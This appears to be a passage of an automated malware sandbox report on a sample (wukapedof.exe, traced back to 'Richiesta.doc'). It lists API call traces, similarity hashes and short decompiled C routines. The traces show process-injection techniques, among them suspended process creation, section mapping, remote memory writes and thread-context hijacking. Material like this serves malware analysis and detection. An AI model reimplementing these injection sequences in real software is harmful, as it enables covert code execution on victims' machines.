    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141memorythread
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}






0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1395, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71 Total matches: 162processmemory
Similarity
  • Total matches: 162
  • API ID: CreateProcessGetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 1501718689-2746444292
  • Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
  • Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
  • Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
  • Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
APIs
  • memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354
  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
  • GetLastError.KERNEL32(00000001), ref: 002E1422
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: wukapedof.exe Analysis ID: 68439

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:AD22F7E25E6FCCF900B5060D4C5E9532
Total matches:32
Initial Analysis Report:Open
Initial sample Analysis ID:68439
Initial sample SHA 256:78E57715D0C6C12E90E96D82B3FF839B78C421F5EFF663AAB6D19DA5B6D82200
Initial sample name:Richiesta.doc

Similar Executed Functions

Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
